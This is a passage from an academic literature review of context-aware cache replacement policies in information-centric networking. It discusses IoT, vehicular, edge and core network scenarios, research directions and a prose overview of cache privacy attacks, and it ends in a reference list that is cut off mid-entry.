the policies or their properties. That also limited a more in-depth analysis from the perspective of the proportion of impacts for different contexts and scenarios, since the extent to which context characteristics affected cache replacement strategies varied for different scenarios. We must also highlight that most of the works did not indicate the confidence interval in their experiments. A few of the differences between policies’ performance measurements were relatively small, and a confidence interval would help investigate the significance of the difference values. Due to the reasons mentioned above, the policy choosing process can not be reduced to rule-based schemes or related solutions. Instead, the choosing process is suitable for solutions that dynamically analyze context factors and perform large-scale correlations between the factors and policies, for example, with reinforcement learning techniques. At this point, we can indicate, though, potential context characteristics to enhance the eviction performance in emergent ICN scenarios. We present this analysis in the next section (Applications). Lastly, we also highlight the overlook of content-Negative Acknowledgments (content-NACKs) packets. In ICNs, content-NACKs are special packets generated by content producers in response to requests for non-existent content. They can be encoded as data packets with a specific content-type feature. In that case, content-NACKs are processed as regular data packets and cached in the network routers. Although caching content-NACKs is useful to respond to possible subsequent requests for the same non-existent content efficiently, it may insert vulnerability points in ICN architectures (Compagno et al., 2015). Current eviction policies are not aware of content-NACK packets, and there is a need to investigate if this lack of awareness impacts cache management and security. Nonetheless, a different approach is questioning if those packets should be cached on the network and how it could impact performance. In deciding not to cache, the processing of content-NACKs can be delegated to the cache placement policies to bypass these packets. This way, the content-NACKs could follow the forward processing of data packets without caching. APPLICATIONS The informational RFC 7476 (Pentikousis et al., 2015) presented by the IRTF-ICNRG describes a set of application areas in which ICN architectures can potentially perform better than the current host-centric Internet approach. This technical document discusses diverse network contexts in emergent areas such as social networking, real-time communication, mobile networking, vehicular networking, delay- and Disruption- Tolerant Networking (DTN), IoT, and Smart Cities. Thus, we extend the discussion to correlate characteristics of emergent networks with the context characteristics relevant to the choice of suitable cache replacement schemes. We highlight the most suitable context characteristics for generic network contexts on information-centric IoT (Arshad et al., 2018; Dong & Wang, 2016), vehicular named-data Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 29/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ networking (Khelifi et al., 2020), and ICN-enable edge and core networks (Zhou et al., 2017; Zhang et al., 2018) in the following subsections. Table 9 summarizes this discussion. Information-centric internet of things The adoption of IoT networks in many segments of society like healthcare, transportation, security, industry, agriculture, communications, and infotainment, is gradually changing the way people interact with the physical world by connecting new things to the Internet. Things can be any device enhanced with sensor and technology capabilities to generate and transmit data, and when aggregated with intelligent services of IoT applications, they can improve processes, business, and life quality. The imminent revolution of IoT applications must be followed by a revolution in how the network structure deals with the content. The current Internet architecture is fundamentally not prepared to deal with the massive amount of data from an expected number of billions of heterogeneous devices. The majority of IoT applications will be content-oriented, and TCP/IP will be struggling to meet their bandwidth requirements. Cache-enabled solutions like information-centric architectures are strong candidates to assist in the deployment of IoT applications (Arshad et al., 2018; Quevedo, Corujo & Aguiar, 2014; Dong & Wang, 2016; Araújo, De Sousa & Sampaio, 2019). The ubiquitous content caching of ICN contributes to reducing the delay to retrieve content and enhances the contents’ availability, especially when dealing with power restricted devices that periodically switch on and off in duty cycling to save resources. In cache-enabled network solutions, IoT traffic usually is offloaded at the Internet content routers through a connected gateway (Rao, Schelen & Lindgren, 2016; Meddeb et al., 2017) to aggregate the services of specialized IoT cloud platforms, such as Cisco IoT Cloud Connect, Microsoft Azure IoT Suite, and Google Could IoT. Also, the IoT devices Table 9 Suggestion of cache replacement policy category for different ICN-enable scenarios. Cache-enable network Characteristics and/or requirements Policy category Correlation of requirements with context dimensions IoT (Smart home, home care…) High heterogeneity among IoT devices with different priorities; High ephemerality of contents; Limited resources Content and node-based Content features, like content provider identification, priority, and time-related properties VANETs High intermittency of connections; Multi- path propagation; Different strategies for delay-sensitive data from safety applications and delay-tolerant data from infotainment applications Content and node-based Node location properties like mobility pattern plus direction, node’s rank according to topology position; Content features, like type, priority, and popularity and time-related properties Edge computing (Small-cells radio access; 5G; Device-to-device (D2D) communication; Unmanned Aerial Vehicles (UAVs)) High temporal and spatial correlation of content requests; Enables clusters by user similarities Content and future human- based Content popularity properties; User preferences, habits, and social interaction Internet-scale networks Globally content preferences; Heterogeneous link/node capacities; Long geographical distances Content, node and network- based Content feature and popularity properties; Network topology, resource, and time- related properties; Node resource and traffic properties Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 30/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ can cache the traffic in a dynamically distributed IoT network (Hahm et al., 2016). Whether one case or another, two significant characteristics are a large number of heterogeneous devices and the ephemerality of the content produced by them. Therefore, the suitable kind of cache replacement schemes for information-centric IoTs should deal with both characteristics. In the former, the different types of devices usually have different resources restrictions in terms of processing capabilities, memory, energy constraints, and they produce contents with different requirements regarding the context. For example, Smart Cities will need to integrate intelligent urban sensing services for many proposes, such as management of smart garbage collection, street lighting, parking, the monitoring of road conditions, urban noise, security cameras, and environmental conditions, among other possibilities. In this case, the infrastructure comprises a diversity of sensors with different content production rates and characteristics. The replacement scheme may apply different treatment to the contents according to the type of device by exploring both content and node context dimensions, with features like content provider identification, content priority, and node resource features. The latter characteristic points out the typical time-restricted data generated by some IoT devices that periodically inform sensor measurements monitoring the environment. For example, the content periodically generated by temperature sensors and collected by distributed applications to monitor the ambient in urban areas can be usefully cached to serve user applications’ requests. However, the most recent measure will usually be of interest to most applications, and there is no need to maintain the previous measures in the cache. The replacement scheme should also combine time-related features of the content context dimension in the eviction process logic. The combinations of the features mentioned above can help detect redundant contents from the same producer while increasing the techniques for stale content detection. Vehicular named-data networking Vehicular networking exhibit singular characteristics in traffic generation patterns, delivery requirements, and spatial and temporal scope (Pentikousis et al., 2015), mostly due to high node mobility, very intermittent connections, and the support for typical road- traffic-related applications (Li et al., 2020a), infotainment applications, and code dissemination (Li, Zhao & Wong, 2020b). In vehicular networking, the vehicles can exchange information with any other communication device available next to the vehicle in a concept of Vehicle-to-everything (V2X) communication. This includes communication between vehicle and other vehicles (Vehicle-to-Vehicle—V2V), or road infrastructure (Vehicle-to-Infrastructure—V2I), communication network structure (Vehicle-to-Network—V2N), pedestrians (Vehicle-to- Pedestrian—V2P), or any other communication device. In all those variations, the content requests usually present highly temporal/spatial dependencies, and the in-network caching capabilities of ICNs can potentially improve the content delivery process. Regarding the caching strategy, the replacement scheme should consider the characteristics mentioned above because they can affect the local relevance of contents. For example, accident information’s relevance is highly dependent on the vehicle location and the direction towards it was moving (De Sousa, Araújo & Sampaio, 2018). If the Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 31/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ vehicle has passed the accident, that information may no longer be useful. The replacement schemes can handle this decision with node location properties like mobility pattern, plus vehicle direction, and node’s rank according to the current topology position. Different strategies should be applied to deal with the different types of applications combined with node location properties. For that, the strategy can explore content features, like content type and content priority. The road-traffic-related applications, such as road congestion notification, traffic monitoring, and accident warning, usually are delay- sensitive applications and are better handled by content time-related properties or even newly type-specific properties. Similarly, applications for code dissemination designed to support smart city infrastructures’ upgrades can benefit from those properties. Meanwhile, the infotainment applications are mostly delay-tolerant and more suitable to be handled by content popularity features. In-network cache-based data offloading through edge computing Caching at the edge in Mobile Edge Computing (MEC) (Safavat, Naveen & Rawat, 2019) will play an essential role in the next-generation wireless network. The Radio Access Network (RAN) is enhanced with cache capacity on base station structures to better attend the content demand due to its proximity. This way, Small-cell Base Stations (SBS), Macro-cell Base Stations (MBS), Wi-fi Access Points (AP), mobile devices, and even recent cache-enabled UAVs (Zhang et al., 2020; Ji et al., 2020; Huang et al., 2020) can store contents and respond to the content requests faster. UAVs can act as flying base stations to support the ground cellular network. They can also work as relay nodes to assist content delivery and data collection in areas without available transmission links. The integration with ICN concepts leverages the mobile-edge caching by supporting in-network caching (Zhou et al., 2017; Psaras et al., 2018; Shariat, Tizghadam & Leon-Garcia, 2016). The imminent fifth-Generation (5G) mobile networks also reinforces that merge as several initiatives discuss the benefit of the integration with ICN (Zhang et al., 2018; Liang, Yu & Zhang, 2015). A fundamental characteristic created by the user’s closeness is a high temporal and spatial correlation of content requests. In this way, one of the widely explored approaches at the network edge is user-centric clustering techniques (Ribeiro, Sampaio & Ziviani, 2018; He, Wang & Wang, 2019; ElBamby et al., 2014). User characteristics are the input and motivation for virtual groupings, whether regarding the network structure or the users’ connection to the network. As a consequence, user and their content requests can be grouped according to user behavior patterns. Due to the characteristics above, the replacement schemes for in-network caching at the edge can benefit from content-based properties, especially content popularity features, and the exploration of a variety of human properties related to preferences, habits, and social interaction. Therefore, user behavior analysis is a relevant area in the future of edge- caching, fostering future human-based replacement policies. ICN-enabled core network ICN’s benefits encompass large-scale networks with backbone core nodes and high-speed links with different capacities, interconnecting heterogeneous Autonomous Systems Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 32/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ (AS) with multiple access networks. In this way, core networks aggregate content requests from different access networks, and unlike the edge, the temporal/spatial correlation of requests is gradually reduced and becomes weaker as the content requests approach the core nodes. Many solutions enhance ICN’s applicability at core network structures for inter-domain network services such as routing (Liu et al., 2019a), traffic engineering (Li et al., 2019), and globally accessible name schemes (Van Adrichem & Kuipers, 2013). Because of the considerable physical distances naturally presented in large-scale networks to connect content consumers and producers, requests typically have to traverse several nodes within the network. Therefore, the network topology context must be taken into account to optimize cache replacement policies in content-based core nodes. Context properties, in this case, are related to the distance connecting two end-nodes, like hop count, properties related to the network resources, like packet transmission cost, link capacity, and time-related features with network delay for retrieving content. The cache replacement schemes should also explore content and node contexts to reflect globally content preferences and the different capacities of core nodes, respectively. The content feature and popularity properties and node resource and traffic properties may further increment the replacement policies’ decision. On the other hand, there is a trade- off relating the performance while processing many context information, since core routers process requests at line speed. RESEARCH DIRECTIONS In this section, we discuss different research directions for context-aware cache replacement schemes in ICNs. Context information management Dealing with contextual information requires well-defined procedures on acquiring, representing, reason, and distributing the information. Context information management is widely studied and applied in many sciences that rely on context-awareness (Perera et al., 2013). Still, it is a challenge for complex systems such as dynamically distributed networks to efficiently perform online context management, especially when there is a need to represent a high number of dimensions and elements relevant to represent the domain. The integration between ICN and SDNs (Kim, Chung & Moon, 2015; Charpinel et al., 2016; Yao et al., 2016; Kalghoum, Gammar & Saidane, 2018; Liu et al., 2018; Saadeh et al., 2019) can further benefit context management solutions because of the SDN paradigm’s centralized control view. It is necessary to investigate what context information could be efficiently handled by central controlling. The sets of context features identified within our proposed classification are enablers to a semantic representation of the context domain and can be extended or adapted according to different application requirements. However, towards an efficient real-world deployment, there is also the need to argue about the quality of context information. Quality can associate many aspects like reliability, precision, timeless, access right, significance, granularity, and completeness. Those aspects are translated into metrics defined by the science of Quality of Context (QoC) (Buchholz, Küpper & Schiffers, Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 33/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ 2003). The relevance of QoC metrics varies following the type of information. Hence, different QoC metrics should follow the different context subcategories in each context dimension. Scalability of context suitability Exploring context information is essential to address a mismatch between caching policies and emerging networks. This exploration contributes to achieving more potentially precise and customized techniques. However, the more the use of contextual information, the more computationally expensive the caching scheme might become. The need to compute more context information may increase the complexity of the caching policy itself. Therefore, it is essential to investigate the performance cost of individual context information and the solution as a whole. The performance cost depends not only on managing the information but also on how the policy treats the information. Machine learning techniques In addition to being used for context information inference (Zhao et al., 2017; Nakayama, Ata & Oka, 2015; Liu et al., 2018), machine learning techniques can investigate how to exploit better context information to optimize the eviction process. In one perspective, machine learning techniques could select which contextual information is most relevant and should shape the eviction process. The relevance of contextual information may vary depending on the network and objectives. This way, given a network with a set of available contextual information, it would help investigate how to choose what should be used by the eviction scheme to increase network performance. In another perspective, the techniques can direct the learning of the best kind of policy based on what context information is available. Reinforcement learning techniques have been successfully applied for caching schemes (Sung et al., 2016; Sadeghi, Sheikholeslami & Giannakis, 2017). However, in those works, the context state is represented solely by the cached contents in an instant of time. It would be relevant to extend the concept of context to represent the state with more available information that would impact the learning policy process. Depending on the number of context information used, there may be a large space of possible states, which will require considerable computational effort to represent the possible variations. When most of the states are rarely revisited, the chosen technique must deal with some sort of generalization. Furthermore, model-free techniques are best indicated when there is no previous knowledge dataset to help the decision process. Dynamic and adaptive instantiation of cache policies Along with SDN and ICN, Network Function Virtualization (NFV) techniques are strong candidates for realizing and fostering next-generation networks (Zhang et al., 2018; Saadeh et al., 2019). Through the network function virtualization concept, in-network caching strategies can quickly execute as Virtual Network Function (VNF) along with some management structure. This combination paves the way for efficient deployment of Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 34/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ adaptive caching policies according to the context’s dynamic changes. To realize a plug- and-play vision of virtual function would be interesting to have a rich repository of heterogeneous caching functions and multi-attribute functions exploring different combinations of context information. Human aspects In recent years, the community has witnessed a growing number of researches focused on solutions that exploit the human-user context to solve problems in different areas (Shafigh et al., 2019; Zaidi et al., 2019; Zeng et al., 2019). Due to mobile computing expansion, networking-related studies also tend to consider human aspects such as interactions, social ties, and personality to propose human-awareness solutions. This movement from device-to-device to people-to-people communication paradigm aims to look at network configurations taking into account the user’s perspective, integrating human perception approaches with QoS metrics, and further, with the mapping of user behavioral profiles. Network contexts are more likely to cope with group-based rather than individual user profiles. Different user profiles, such as personality profiles, may reflect distinct patterns of how users in each profile interact with the network, and consequently, each profile may produce different impacts on the network resource consumption. Therefore, the network can adapt according to the predominant user profiles to improve the distribution/consumption of resources and user QoE at the same time. In ICN research, human factors present great potentials to improve the communication service delivery, in particular through adaptive caching solutions (Ribeiro, Sampaio & Ziviani, 2018). One approach is to explore potential correlations between user characteristics and cache policies and adopt mechanisms for dynamically adapt the most suitable caching strategies to the predominant user behavior. A key challenging consists of finding out the human aspects that most positively impact the network efficiency and how they could be operatively explored in ICN architectures. That requires a multidisciplinary view with the integration of psychology research to support lower granularity levels of user information. Privacy In-network cache aggregates benefits to ICN architectures by reducing bandwidth consumption and the latency to deliver contents over the network, but it also introduces architectural vulnerabilities regarding cache privacy (Acs et al., 2013). For example, in side-channel timing attacks, a malicious user can deduce what content was accessed recently by another user on the same network by merely measuring content delivery times with standard content requests. Acs et al. (2013) discussed techniques for mitigating privacy caching attacks in which contents marked as private could have different treatments by the cache management mechanism. One countermeasure presented to inhibit the timing attack consists of the insertion of artificial delay times in the content delivery process, so the malicious user cannot differentiate which content was retrieved from the cache or directly from the producer. Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 35/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ Recent efforts from the NDN research community have tried to address many of the current privacy concerns (Compagno et al., 2020; Dogruluk et al., 2020), but more work lies ahead concerning the context information processed by caching strategies. The use of context information to allow the dynamic adoption of the most appropriate cache policy may require the processing of sensitive data of related users stored in communication devices. One major concern resides in guaranteeing the anonymity of data processed, particularly involving users for privacy-preserving cache management. Similarly, there is a concern about the privacy of cache management strategies adopted on the network routers. Fan et al. (2020) recently presented a method capable of detecting the placement policy configured in the routers. As described in the malicious attempt to discover the previously accessed content in the network, the method does not require any privileged access and can infer a placement policy through ordinary content requests. Knowing the strategies used for content management can enhance the inference mechanisms of accessed content. CONCLUSIONS This article presented a comprehensive and systematic review of studies regarding cache replacement policies in ICNs. The literature presents a vast set of eviction strategies exploiting combinations of multi-dimension aspects of context information in different ways, aiming at making more customized and effective decisions about the relevance of contents. Thus, among its findings, the SLR showed the relevance of considering context’s properties in choosing suitable replacement policies. The study revealed that efficient utilization of cache resources in ICNs relies on deploying cache replacement policies according to the network contexts. The SLR contributes to characterize the context factors correlated with the caching policies and the reported effect of context variations on cache replacement policies’ performance. The compilation of evidence shows no single context factor determining the choice of policies; there is no explicit pattern regarding context properties variations to support the choosing process of policies for different network contexts. The results reaffirm the absence of a single optimal strategy to meet the requirements of all network since the caching policies’ performances vary according to different context characteristics. Additionally, the dynamic nature of most networks leads to on-demand changes in the context characteristics, for instance, changes in traffic patterns or user preferences, and the ICN strategies must adapt to these changes in an attempt to ensure the best network performance. Therefore, there is the need to assist the choosing process of suitable schemes according to the current context, and further, to cope with the natural dynamism of context variations in networks. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by CAPES (88887.468235/2019-00), FAPESB (TIC0004/2015), CNPq (310.201/2019-5,432064/2018-4), and FAPERJ (E-26/203.046/2017). There was no Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 36/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ additional external funding received for this study. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: CAPES: 88887.468235/2019-00. FAPESB: TIC0004/2015. CNPq: 310.201/2019-5 and 432064/2018-4. FAPERJ: E-26/203.046/2017. Competing Interests The authors declare that they have no competing interests. Author Contributions � Stéfani Pires conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Artur Ziviani conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. � Leobino N. Sampaio conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: The study did not use raw data or code as it is a literature review. REFERENCES Abdullahi I, Arif S, Hassan S. 2015. Survey on caching approaches in information centric networking. Journal of Network and Computer Applications 56:48–59. Abidi A, Gammar S. 2015. Towards new caching strategy for information-centric networking based on data proximity control. In: 2015 IEEE International Conference on Computer and Information Technology; Ubiquitous Computing and Communications; Dependable, Autonomic and Secure Computing; Pervasive Intelligence and Computing (CIT/IUCC/DASC/PICOM). Piscataway: IEEE, 540–547. Abowd GD, Dey AK, Brown PJ, Davies N, Smith M, Steggles P. 1999. Towards a better understanding of context and context-awareness. In: International Symposium on Handheld and Ubiquitous Computing. Springer, 304–307. Abrams M, Standridge C, Abdulla G, Fox E, Williams S. 1996. Removal policies in network caches for world-wide web documents. ACM SIGCOMM Computer Communication Review 26(4):293–305. Acs G, Conti M, Gasti P, Ghali C, Tsudik G. 2013. Cache privacy in named-data networking. In: 2013 IEEE 33rd International Conference on Distributed Computing Systems. Piscataway: IEEE, 41–51. Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 37/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ Ahlgren B, Dannewitz C, Imbrenda C, Kutscher D, Ohlman B. 2012. A survey of information- centric networking. IEEE Communications Magazine 50(7):26–36. Al-Turjman F. 2017. Cognitive caching for the future sensors in fog networking. Pervasive and Mobile Computing 42:317–334. Al-Turjman FM, Al-Fagih AE, Hassanein HS. 2013. A value-based cache replacement approach for information-centric networks. In: LCN Workshops. 874–881. Alegre U, Augusto JC, Clark T. 2016. Engineering context-aware systems and applications: a survey. Journal of Systems and Software 117:55–83. Amadeo M, Campolo C, Molinaro A. 2016. Information-centric networking for connected vehicles: a survey and future perspectives. IEEE Communications Magazine 54(2):98–104. Amadeo M, Campolo C, Molinaro A, Ruggeri G. 2014. Content-centric wireless networking: a survey. Computer Networks 72:1–13. An Y, Luo X. 2018. An in-network caching scheme based on energy efficiency for content-centric networks. IEEE Access 6:20184–20194. Aoki M, Shigeyasu T. 2017. Effective content management technique based on cooperation cache among neighboring routers in content-centric networking. In: 2017 31st International Conference on Advanced Information Networking and Applications Workshops (WAINA). Piscataway: IEEE, 335–340. Araújo FRC, De Sousa AM, Sampaio LN. 2019. Scan-mob: an opportunistic caching strategy to support producer mobility in named data wireless networking. Computer Networks 156:62–74. Araldo A, Rossi D, Martignon F. 2015. Cost-aware caching: caching more (costly items) for less (isps operational expenditures). IEEE Transactions on Parallel and Distributed Systems 27(5):1316–1330. Arshad S, Azam MA, Rehmani MH, Loo J. 2018. Recent advances in information-centric networking-based internet of things (icn-iot). IEEE Internet of Things Journal 6(2):2128–2158. Badov M, Seetharam A, Kurose J, Firoiu V, Nanda S. 2014. Congestion-aware caching and search in information-centric networks. In: Proceedings of the 1st ACM Conference on Information- Centric Networking. New York: ACM, 37–46. Balamash A, Krunz M. 2004. An overview of web caching replacement algorithms. IEEE Communications Surveys & Tutorials 6(2):44–56. Bari MF, Chowdhury SR, Ahmed R, Boutaba R, Mathieu B. 2012. A survey of naming and routing in information-centric networks. IEEE Communications Magazine 50(12):44–53. Baugh JP, Guo J. 2018. A per-face popularity scheme to increase cache robustness in information- centric networks. Procedia Computer Science 134:267–274. Beck H, Bierbaumer B, Dao-Tran M, Eiter T, Hellwagner H, Schekotihin K. 2017. Stream reasoning-based control of caching strategies in ccn routers. In: 2017 IEEE International Conference on Communications (ICC). Piscataway: IEEE, 1–6. Bettini C, Brdiczka O, Henricksen K, Indulska J, Nicklas D, Ranganathan A, Riboni D. 2010. A survey of context modelling and reasoning techniques. Pervasive and Mobile Computing 6(2):161–180. Bilal M, Kang S-G. 2014. Time aware least recent used (tlru) cache management policy in icn. In: 16th International Conference on Advanced Communication Technology (ICACT), 2014. Piscataway: IEEE, 528–532. Bilal M, Kang S-G. 2017. A cache management scheme for efficient content eviction and replication in cache networks. IEEE Access 5:1692–1701. Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 38/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ Buchholz T, Küpper A, Schiffers M. 2003. Quality of context: what it is and why we need it. In: Workshop of the HP OpenView University Association. Caarls W, Hargreaves E, Menasché DS. 2015. Q-caching: an integrated reinforcement-learning approach for caching and routing in information-centric networks. Available at https://arxiv. org/abs/1512.08469. Chai WK, He D, Psaras I, Pavlou G. 2012. Cache “less for more’’ in information-centric networks. In: Bestak R, Kencl L, Li LE, Widmer J, Yin H, eds. NETWORKING 2012. Lecture Notes in Computer Science. Vol. 7289. Berlin: Springer DOI 10.1007/978-3-642-30045-5_3. Chandrasekaran G, Wang N, Hassanpour M, Xu M, Tafazolli R. 2018. Mobility as a service (maas): a d2d-based information centric network architecture for edge-controlled content distribution. IEEE Access 6:2110–2129. Chandrasekaran G, Wang N, Tafazolli R. 2015. Caching on the move: towards d2d-based information centric networking for mobile content distribution. In: 2015 IEEE 40th Conference on Local Computer Networks (LCN). Piscataway: IEEE, 312–320. Chao F, Huang T, Jiang L, Chen J-Y., Liu Y-J. 2013. Fast convergence caching replacement algorithm based on dynamic classification for content-centric networks. Journal of China Universities of Posts and Telecommunications 20(5):45–50. Charpinel S, Santos CAS, Vieira AB, Villaca R, Martinello M. 2016. Sdccn: a novel software defined content-centric networking approach. In: 2016 IEEE 30th International Conference on Advanced Information Networking and Applications (AINA). Piscataway: IEEE, 87–94. Che H, Tung Y, Wang Z. 2002. Hierarchical web caching systems: modeling, design and experimental results. IEEE Journal on Selected Areas in Communications 20(7):1305–1314. Chen B, Liu L, Zhang Z, Yang W, Ma H. 2016. Brr-cvr: a collaborative caching strategy for information-centric wireless sensor networks. In: 2016 12th International Conference on Mobile Ad-Hoc and Sensor Networks (MSN). Piscataway: IEEE, 31–38. Chen M, Mau DO, Zhang Y, Taleb T, Leung VC. 2014. Vendnet: vehicular named data network. Vehicular Communications 1(4):208–213. Chen T, Li H, An J, Wang Y, Sun J, Wang H. 2017. The improved multi-attribute caching: an efficient cache strategy in ccn. In: 2017 IEEE 9th International Conference on Communication Software and Networks (ICCSN). Piscataway: IEEE, 1007–1011. Chen X, Fan Q, Yin H. 2013. Caching in information-centric networking: From a content delivery path perspective. In: 9th International Conference on Innovations in Information Technology (IIT), 2013. Piscataway: IEEE, 48–53. Chootong S, Thaenthong J. 2017. Cache replacement mechanism with content popularity for vehicular content-centric networks (vccn). In: 2017 14th International Joint Conference on Computer Science and Software Engineering (JCSSE). Piscataway: IEEE, 1–6. Chorley MJ, Colombo GB, Allen SM, Whitaker RM. 2013. Visiting patterns and personality of foursquare users. In: 2013 International Conference on Cloud and Green Computing. Piscataway: IEEE, 271–276. Compagno A, Conti M, Ghali C, Tsudik G. 2015. To nack or not to nack? Negative acknowledgments in information-centric networking. In: 2015 24th International Conference on Computer Communication and Networks (ICCCN). Piscataway: IEEE, 1–10. Compagno A, Conti M, Losiouk E, Tsudik G, Valle S. 2020. A proactive cache privacy attack on ndn. In: NOMS 2020-2020 IEEE/IFIP Network Operations and Management Symposium. Piscataway: IEEE, 1–7. Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 39/51 https://arxiv.org/abs/1512.08469 https://arxiv.org/abs/1512.08469 http://dx.doi.org/10.1007/978-3-642-30045-5_3 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ Conti M, Boldrini C, Kanhere SS, Mingozzi E, Pagani E, Ruiz PM, Younis M. 2015. From manet to people-centric networking: Milestones and open research challenges. Computer Communications 71:1–21. Dai H, Liu B, Yuan H, Crowley P, Lu J. 2017. Analysis of tandem pit and cs with non-zero download delay. In: INFOCOM 2017-IEEE Conference on Computer Communications. Piscataway: IEEE, 1–9. De Sousa AM, Araújo FRC, Sampaio LN. 2018. A link-stability-based interest-forwarding strategy for vehicular named data networks. IEEE Internet Computing 22(3):16–26. Dey AK. 2001. Understanding and using context. Personal and Ubiquitous Computing 5(1):4–7. Dhiab I, Barouni Y, Khalfallah S, Slama JBH. 2017. Pseudo-lru replacement policy in named data networking using fat tree datacenter network architecture. In: 2017 IEEE/ACS 14th International Conference on Computer Systems and Applications (AICCSA). Piscataway: IEEE, 682–687. Din IU, Hassan S, Almogren A, Ayub F, Guizani M. 2019. Puc: packet update caching for energy efficient iot-based information-centric networking. Future Generation Computer Systems 111:634–643 DOI 10.1016/j.future.2019.11.022. Din IU, Hassan S, Khan MK, Guizani M, Ghazali O, Habbal A. 2017. Caching in information- centric networking: strategies, challenges, and future research directions. IEEE Communications Surveys & Tutorials 20(2):1443–1474. Dogruluk E, Gama Ó, Costa AD, Macedo J. 2020. Public key certificate privacy in vondn: voice over named data networks. IEEE Access 8:145803–145823. Dong L, Wang G. 2016. Enhanced in-network capabilities of information-centric networks for emerging iot applications. In: 2016 IEEE International Conference on Internet of Things (iThings) and IEEE Green Computing and Communications (GreenCom) and IEEE Cyber, Physical and Social Computing (CPSCom) and IEEE Smart Data (SmartData). Piscataway: IEEE, 573–577. Dron W, Leung A, Uddin M, Wang S, Abdelzaher T, Govindan R, Hancock J. 2013. Information-maximizing caching in ad hoc networks with named data networking. In: 2013 IEEE 2nd Network Science Workshop (NSW). Piscataway: IEEE, 90–93. Duan J, Wang X, Wang S, Xu S. 2013. Profit-based caching for information-centric network. In: 2013 IEEE 11th International Conference on Dependable, Autonomic and Secure Computing (DASC). Piscataway: IEEE, 481–486. ElBamby MS, Bennis M, Saad W, Latva-Aho M. 2014. Content-aware user clustering and caching in wireless small cell networks. In: 2014 11th International Symposium on Wireless Communications Systems (ISWCS). Piscataway: IEEE, 945–949. Eum S, Nakauchi K, Murata M, Shoji Y, Nishinaga N. 2012. Catt: potential based routing with content caching for icn. In: Proceedings of the second edition of the ICN workshop on Information-centric networking. 49–54. Fan C, Shannigrahi S, Papadopoulos C, Partridge C. 2020. Discovering in-network caching policies in ndn networks from a measurement perspective. In: Proceedings of the 7th ACM Conference on Information-Centric Networking. 106–116. Fang C, Yu FR, Huang T, Liu J, Liu Y. 2014. A survey of energy-efficient caching in information- centric networking. IEEE Communications Magazine 52(11):122–129. Fang C, Yu FR, Huang T, Liu J, Liu Y. 2015. A survey of green information-centric networking: research issues and challenges. IEEE Communications Surveys & Tutorials 17(3):1455–1472. Fricker C, Robert P, Roberts J. 2012a. A versatile and accurate approximation for lru cache performance. In: 2012 24th International Teletraffic Congress (ITC 24). Piscataway: IEEE, 1–8. Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 40/51 http://dx.doi.org/10.1016/j.future.2019.11.022 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ Fricker C, Robert P, Roberts J, Sbihi N. 2012b. Impact of traffic mix on caching performance in a content-centric network. In: 2012 Proceedings IEEE INFOCOM Workshops. Piscataway: IEEE, 310–315. Gallo M, Kauffmann B, Muscariello L, Simonian A, Tanguy C. 2014. Performance evaluation of the random replacement policy for networks of caches. Performance Evaluation 72:16–36. Garca G, Beben A, Ramón FJ, Maeso A, Psaras I, Pavlou G, Wang N, Śliwiński J, Spirou S, Soursos S, Hadjioannou E. 2011. Comet: content mediator architecture for content-aware networks. In: 2011 Future Network & Mobile Summit. Piscataway: IEEE, 1–8. Garetto M, Leonardi E, Martina V. 2016. A unified approach to the performance analysis of caching systems. ACM Transactions on Modeling and Performance Evaluation of Computing Systems 1(3):12. Ge C, Wang N, Skillman S, Foster G, Cao Y. 2016. Qoe-driven dash video caching and adaptation at 5g mobile edge. In: Proceedings of the 3rd ACM Conference on Information-Centric Networking. New York: ACM, 237–242. Ghahfarokhi BS, Moghim N, Eftekhari S. 2017. Reducing channel zapping time in live tv broadcasting over content centric networks. Multimedia Tools and Applications 76(22):23239–23271. Gomaa H, Messier GG, Williamson C, Davies R. 2013. Estimating instantaneous cache hit ratio using markov chain analysis. IEEE/ACM Transactions on Networking 21(5):1472–1483. Gür G. 2015. Energy-aware cache management at the wireless network edge for information- centric operation. Journal of Network and Computer Applications 57:33–42. Hahm O, Baccelli E, Schmidt T, Waehlisch M, Adjih C. 2016. A named data network approach to energy efficiency in iot. In: IEEE GLOBECOM Workshop on Named Data Networking for Challenged Communication Environments. Piscataway: IEEE. Han B, Wang X, Chen X, Kwon TT, Choi Y, Mau DO, Chen M. 2014. Ppp: prefix-based popularity prediction for effective caching in content-centric networking. In: Proceedings of the Ninth International Conference on Future Internet Technologies. ACM, 7. He S, 